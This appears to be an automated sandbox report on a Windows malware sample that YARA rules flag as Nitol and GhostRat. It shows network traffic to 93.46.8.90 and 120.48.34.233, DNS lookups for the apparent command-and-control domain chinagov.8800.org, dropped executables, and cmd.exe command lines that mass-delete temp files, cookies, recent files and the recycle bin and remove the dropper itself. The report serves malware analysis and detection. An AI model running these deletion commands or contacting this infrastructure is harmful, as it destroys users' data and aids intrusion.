                               Dec 23, 2024 09:13:33.343485117 CET | 49724 | 80 | 192.168.2.9 | 192.168.2.1
                               Dec 23, 2024 09:13:36.914457083 CET | 49761 | 8090 | 192.168.2.9 | 93.46.8.90
                               Dec 23, 2024 09:13:37.034209967 CET | 8090 | 49761 | 93.46.8.90 | 192.168.2.9
                               Dec 23, 2024 09:13:37.036398888 CET | 49761 | 8090 | 192.168.2.9 | 93.46.8.90
                               Dec 23, 2024 09:13:37.071522951 CET | 49761 | 8090 | 192.168.2.9 | 93.46.8.90
                               Dec 23, 2024 09:13:37.191291094 CET | 8090 | 49761 | 93.46.8.90 | 192.168.2.9
                               Dec 23, 2024 09:13:40.252317905 CET | 8080 | 49723 | 120.48.34.233 | 192.168.2.9
                               Dec 23, 2024 09:13:40.252594948 CET | 49723 | 8080 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:13:40.290882111 CET | 49723 | 8080 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:13:40.410528898 CET | 8080 | 49723 | 120.48.34.233 | 192.168.2.9
                               Dec 23, 2024 09:13:41.113569021 CET | 49770 | 8080 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:13:41.233191013 CET | 8080 | 49770 | 120.48.34.233 | 192.168.2.9
                               Dec 23, 2024 09:13:41.233314037 CET | 49770 | 8080 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:13:41.286544085 CET | 49770 | 8080 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:13:41.406198978 CET | 8080 | 49770 | 120.48.34.233 | 192.168.2.9
                               Dec 23, 2024 09:13:58.940668106 CET | 8090 | 49761 | 93.46.8.90 | 192.168.2.9
                               Dec 23, 2024 09:13:58.940803051 CET | 49761 | 8090 | 192.168.2.9 | 93.46.8.90
                               Dec 23, 2024 09:13:58.943110943 CET | 49761 | 8090 | 192.168.2.9 | 93.46.8.90
                               Dec 23, 2024 09:13:59.062654972 CET | 8090 | 49761 | 93.46.8.90 | 192.168.2.9
                               Dec 23, 2024 09:14:03.127638102 CET | 8080 | 49770 | 120.48.34.233 | 192.168.2.9
                               Dec 23, 2024 09:14:03.127774000 CET | 49770 | 8080 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:14:03.127866983 CET | 49770 | 8080 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:14:03.247419119 CET | 8080 | 49770 | 120.48.34.233 | 192.168.2.9
                               Dec 23, 2024 09:14:03.474334955 CET | 49816 | 8080 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:14:03.696297884 CET | 8080 | 49816 | 120.48.34.233 | 192.168.2.9
                               Dec 23, 2024 09:14:03.696459055 CET | 49816 | 8080 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:14:03.725639105 CET | 49816 | 8080 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:14:03.845202923 CET | 8080 | 49816 | 120.48.34.233 | 192.168.2.9
                               Dec 23, 2024 09:14:17.834741116 CET | 49841 | 8090 | 192.168.2.9 | 93.46.8.90
                               Dec 23, 2024 09:14:17.954405069 CET | 8090 | 49841 | 93.46.8.90 | 192.168.2.9
                               Dec 23, 2024 09:14:17.954483032 CET | 49841 | 8090 | 192.168.2.9 | 93.46.8.90
                               Dec 23, 2024 09:14:19.283148050 CET | 49841 | 8090 | 192.168.2.9 | 93.46.8.90
                               Dec 23, 2024 09:14:19.402726889 CET | 8090 | 49841 | 93.46.8.90 | 192.168.2.9
                               Dec 23, 2024 09:14:25.612293005 CET | 8080 | 49816 | 120.48.34.233 | 192.168.2.9
                               Dec 23, 2024 09:14:25.612380028 CET | 49816 | 8080 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:14:25.614432096 CET | 49816 | 8080 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:14:25.733956099 CET | 8080 | 49816 | 120.48.34.233 | 192.168.2.9
                               Dec 23, 2024 09:14:26.271347046 CET | 49863 | 8080 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:14:26.391119003 CET | 8080 | 49863 | 120.48.34.233 | 192.168.2.9
                               Dec 23, 2024 09:14:26.391207933 CET | 49863 | 8080 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:14:26.436543941 CET | 49863 | 8080 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:14:26.556097984 CET | 8080 | 49863 | 120.48.34.233 | 192.168.2.9
                               Dec 23, 2024 09:14:39.846821070 CET | 8090 | 49841 | 93.46.8.90 | 192.168.2.9
                               Dec 23, 2024 09:14:39.846935034 CET | 49841 | 8090 | 192.168.2.9 | 93.46.8.90
                               Dec 23, 2024 09:14:39.847033024 CET | 49841 | 8090 | 192.168.2.9 | 93.46.8.90
                               Dec 23, 2024 09:14:39.967506886 CET | 8090 | 49841 | 93.46.8.90 | 192.168.2.9
                               Dec 23, 2024 09:14:48.300180912 CET | 8080 | 49863 | 120.48.34.233 | 192.168.2.9
                               Dec 23, 2024 09:14:48.300358057 CET | 49863 | 8080 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:14:48.300462008 CET | 49863 | 8080 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:14:48.420018911 CET | 8080 | 49863 | 120.48.34.233 | 192.168.2.9
                               Dec 23, 2024 09:14:48.747469902 CET | 49902 | 8080 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:14:48.867120981 CET | 8080 | 49902 | 120.48.34.233 | 192.168.2.9
                               Dec 23, 2024 09:14:48.867337942 CET | 49902 | 8080 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:14:48.925491095 CET | 49902 | 8080 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:14:49.045082092 CET | 8080 | 49902 | 120.48.34.233 | 192.168.2.9
                               Dec 23, 2024 09:15:00.989197016 CET | 49928 | 8090 | 192.168.2.9 | 93.46.8.90
                               Dec 23, 2024 09:15:01.108808041 CET | 8090 | 49928 | 93.46.8.90 | 192.168.2.9
                               Dec 23, 2024 09:15:01.110486031 CET | 49928 | 8090 | 192.168.2.9 | 93.46.8.90
                               Dec 23, 2024 09:15:01.201380014 CET | 49928 | 8090 | 192.168.2.9 | 93.46.8.90
                               Dec 23, 2024 09:15:01.321993113 CET | 8090 | 49928 | 93.46.8.90 | 192.168.2.9
                               Dec 23, 2024 09:15:10.785068989 CET | 8080 | 49902 | 120.48.34.233 | 192.168.2.9
                               Dec 23, 2024 09:15:10.787584066 CET | 49902 | 8080 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:15:10.787584066 CET | 49902 | 8080 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:15:10.907999992 CET | 8080 | 49902 | 120.48.34.233 | 192.168.2.9
                               Dec 23, 2024 09:15:11.449345112 CET | 49944 | 8080 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:15:11.568999052 CET | 8080 | 49944 | 120.48.34.233 | 192.168.2.9
                               Dec 23, 2024 09:15:11.569083929 CET | 49944 | 8080 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:15:19.384989023 CET | 49944 | 8080 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:15:19.504550934 CET | 8080 | 49944 | 120.48.34.233 | 192.168.2.9
                               Dec 23, 2024 09:15:23.004023075 CET | 8090 | 49928 | 93.46.8.90 | 192.168.2.9
                               Dec 23, 2024 09:15:23.004110098 CET | 49928 | 8090 | 192.168.2.9 | 93.46.8.90
                               Dec 23, 2024 09:15:23.004196882 CET | 49928 | 8090 | 192.168.2.9 | 93.46.8.90
                               Dec 23, 2024 09:15:23.123621941 CET | 8090 | 49928 | 93.46.8.90 | 192.168.2.9
                               Dec 23, 2024 09:15:33.457417965 CET | 8080 | 49944 | 120.48.34.233 | 192.168.2.9
                               Dec 23, 2024 09:15:33.460588932 CET | 49944 | 8080 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:15:33.464392900 CET | 49944 | 8080 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:15:33.583913088 CET | 8080 | 49944 | 120.48.34.233 | 192.168.2.9
                               Dec 23, 2024 09:15:33.876785040 CET | 49985 | 8080 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:15:33.996488094 CET | 8080 | 49985 | 120.48.34.233 | 192.168.2.9
                               Dec 23, 2024 09:15:34.000579119 CET | 49985 | 8080 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:15:34.537180901 CET | 49985 | 8080 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:15:34.656831980 CET | 8080 | 49985 | 120.48.34.233 | 192.168.2.9
                               Dec 23, 2024 09:15:41.487292051 CET | 49986 | 8090 | 192.168.2.9 | 93.46.8.90
                               Dec 23, 2024 09:15:41.606981039 CET | 8090 | 49986 | 93.46.8.90 | 192.168.2.9
                               Dec 23, 2024 09:15:41.607091904 CET | 49986 | 8090 | 192.168.2.9 | 93.46.8.90
                               Dec 23, 2024 09:15:41.766782999 CET | 49986 | 8090 | 192.168.2.9 | 93.46.8.90
                               Dec 23, 2024 09:15:41.886392117 CET | 8090 | 49986 | 93.46.8.90 | 192.168.2.9
                               Dec 23, 2024 09:15:55.910871983 CET | 8080 | 49985 | 120.48.34.233 | 192.168.2.9
                               Dec 23, 2024 09:15:55.910985947 CET | 49985 | 8080 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:15:55.911089897 CET | 49985 | 8080 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:15:56.030975103 CET | 8080 | 49985 | 120.48.34.233 | 192.168.2.9
                               Dec 23, 2024 09:15:56.487107038 CET | 49987 | 8080 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:15:56.606661081 CET | 8080 | 49987 | 120.48.34.233 | 192.168.2.9
                               Dec 23, 2024 09:15:56.606754065 CET | 49987 | 8080 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:15:56.678352118 CET | 49987 | 8080 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:15:56.797826052 CET | 8080 | 49987 | 120.48.34.233 | 192.168.2.9
                               Dec 23, 2024 09:16:03.536132097 CET | 8090 | 49986 | 93.46.8.90 | 192.168.2.9
                               Dec 23, 2024 09:16:03.536233902 CET | 49986 | 8090 | 192.168.2.9 | 93.46.8.90
                               Dec 23, 2024 09:16:03.536297083 CET | 49986 | 8090 | 192.168.2.9 | 93.46.8.90
                               Dec 23, 2024 09:16:03.655797005 CET | 8090 | 49986 | 93.46.8.90 | 192.168.2.9
                               Dec 23, 2024 09:16:18.520591021 CET | 8080 | 49987 | 120.48.34.233 | 192.168.2.9
                               Dec 23, 2024 09:16:18.524401903 CET | 49987 | 8080 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:16:18.524401903 CET | 49987 | 8080 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:16:18.643969059 CET | 8080 | 49987 | 120.48.34.233 | 192.168.2.9
                               Dec 23, 2024 09:16:18.843770027 CET | 49717 | 8000 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:16:18.963367939 CET | 8000 | 49717 | 120.48.34.233 | 192.168.2.9
                               Dec 23, 2024 09:16:19.147248983 CET | 49988 | 8080 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:16:19.267069101 CET | 8080 | 49988 | 120.48.34.233 | 192.168.2.9
                               Dec 23, 2024 09:16:19.267189026 CET | 49988 | 8080 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:16:19.335819960 CET | 49988 | 8080 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:16:19.455451012 CET | 8080 | 49988 | 120.48.34.233 | 192.168.2.9
                              TimestampSource PortDest PortSource IPDest IP
                              Dec 23, 2024 09:13:36.493769884 CET5677053192.168.2.91.1.1.1
                              Dec 23, 2024 09:13:36.907227993 CET53567701.1.1.1192.168.2.9
                              Dec 23, 2024 09:13:56.392451048 CET5073553192.168.2.91.1.1.1
                              Dec 23, 2024 09:13:56.529966116 CET53507351.1.1.1192.168.2.9
                              Dec 23, 2024 09:15:00.569003105 CET6243253192.168.2.91.1.1.1
                              Dec 23, 2024 09:15:00.967186928 CET53624321.1.1.1192.168.2.9
                              Dec 23, 2024 09:16:22.204782963 CET5688153192.168.2.91.1.1.1
                              Dec 23, 2024 09:16:22.600442886 CET53568811.1.1.1192.168.2.9
                              TimestampSource IPDest IPChecksumCodeType
                              Dec 23, 2024 09:13:18.292145014 CET192.168.2.1192.168.2.9827e(Port unreachable)Destination Unreachable
                              Dec 23, 2024 09:13:19.296713114 CET192.168.2.1192.168.2.9827e(Port unreachable)Destination Unreachable
                              Dec 23, 2024 09:13:21.296755075 CET192.168.2.1192.168.2.9827e(Port unreachable)Destination Unreachable
                              Dec 23, 2024 09:13:25.296720982 CET192.168.2.1192.168.2.9827e(Port unreachable)Destination Unreachable
                              Dec 23, 2024 09:13:33.343519926 CET192.168.2.1192.168.2.9827e(Port unreachable)Destination Unreachable
                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Dec 23, 2024 09:13:36.493769884 CET192.168.2.91.1.1.10xec39Standard query (0)chinagov.8800.orgA (IP address)IN (0x0001)false
                              Dec 23, 2024 09:13:56.392451048 CET192.168.2.91.1.1.10xb021Standard query (0)chinagov.8800.orgA (IP address)IN (0x0001)false
                              Dec 23, 2024 09:15:00.569003105 CET192.168.2.91.1.1.10x4885Standard query (0)chinagov.8800.orgA (IP address)IN (0x0001)false
                              Dec 23, 2024 09:16:22.204782963 CET192.168.2.91.1.1.10x83abStandard query (0)chinagov.8800.orgA (IP address)IN (0x0001)false
                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Dec 23, 2024 09:13:10.305057049 CET1.1.1.1192.168.2.90x6a42No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                              Dec 23, 2024 09:13:10.305057049 CET1.1.1.1192.168.2.90x6a42No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                              Dec 23, 2024 09:13:36.907227993 CET1.1.1.1192.168.2.90xec39No error (0)chinagov.8800.org93.46.8.90A (IP address)IN (0x0001)false
                              Dec 23, 2024 09:13:56.529966116 CET1.1.1.1192.168.2.90xb021No error (0)chinagov.8800.org93.46.8.90A (IP address)IN (0x0001)false
                              Dec 23, 2024 09:15:00.967186928 CET1.1.1.1192.168.2.90x4885No error (0)chinagov.8800.org93.46.8.90A (IP address)IN (0x0001)false
                              Dec 23, 2024 09:16:22.600442886 CET1.1.1.1192.168.2.90x83abNo error (0)chinagov.8800.org46.82.174.69A (IP address)IN (0x0001)false

                              Target ID:0
                              Start time:03:13:15
                              Start date:23/12/2024
                              Path:C:\Users\user\Desktop\G3izWAY3Fa.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\G3izWAY3Fa.exe"
                              Imagebase:0x400000
                              File size:963'286 bytes
                              MD5 hash:118F7F61B6AFB1DA5E94EA1740222C73
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:true

                              Target ID:2
                              Start time:03:13:16
                              Start date:23/12/2024
                              Path:C:\Windows\Temp\v5.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\temp\v5.exe"
                              Imagebase:0x400000
                              File size:16'896 bytes
                              MD5 hash:48A02F4A003E8CBE683CF5DADA237168
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                              Antivirus matches:
                              • Detection: 100%, Avira
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 100%, ReversingLabs
                              Reputation:low
                              Has exited:true

                              Target ID:3
                              Start time:03:13:16
                              Start date:23/12/2024
                              Path:C:\Windows\Temp\server.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\temp\server.exe"
                              Imagebase:0x400000
                              File size:196'608 bytes
                              MD5 hash:8A953A49796B7F8C7539A6B2BC175397
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000002.3339534621.0000000001FD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: gh0st, Description: unknown, Source: 00000003.00000002.3339534621.0000000001FD0000.00000004.00001000.00020000.00000000.sdmp, Author: https://github.com/jackcr/
                              • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000002.3363429748.0000000002A7D000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: gh0st, Description: unknown, Source: 00000003.00000002.3363429748.0000000002A7D000.00000004.00000010.00020000.00000000.sdmp, Author: https://github.com/jackcr/
                              Antivirus matches:
                              • Detection: 100%, Avira
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 95%, ReversingLabs
                              Reputation:low
                              Has exited:false

                              Target ID:4
                              Start time:03:13:16
                              Start date:23/12/2024
                              Path:C:\Windows\Temp\v5.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\temp\v5.exe
                              Imagebase:0x400000
                              File size:16'896 bytes
                              MD5 hash:48A02F4A003E8CBE683CF5DADA237168
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:false

                              Target ID:5
                              Start time:03:13:16
                              Start date:23/12/2024
                              Path:C:\Windows\Temp\ .exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\temp\ .exe"
                              Imagebase:0x400000
                              File size:1'429'612 bytes
                              MD5 hash:CCEE0912E79D434F0D2C1E11274F23C0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Antivirus matches:
                              • Detection: 4%, ReversingLabs
                              Reputation:low
                              Has exited:false

                              Target ID:6
                              Start time:03:13:16
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\system32\cmd.exe" /c del C:\Windows\temp\v5.exe > nul
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:7
                              Start time:03:13:16
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:8
                              Start time:03:13:26
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:9
                              Start time:03:13:26
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:10
                              Start time:03:13:26
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:11
                              Start time:03:13:26
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:12
                              Start time:03:13:26
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:13
                              Start time:03:13:26
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:14
                              Start time:03:13:26
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:15
                              Start time:03:13:26
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:16
                              Start time:03:13:26
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:17
                              Start time:03:13:26
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:18
                              Start time:03:13:26
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:20
                              Start time:03:13:27
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:21
                              Start time:03:13:29
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:22
                              Start time:03:13:29
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:24
                              Start time:03:13:30
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:25
                              Start time:03:13:30
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:26
                              Start time:03:14:05
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:27
                              Start time:03:14:05
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:28
                              Start time:03:14:05
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:29
                              Start time:03:14:05
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:30
                              Start time:03:14:05
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

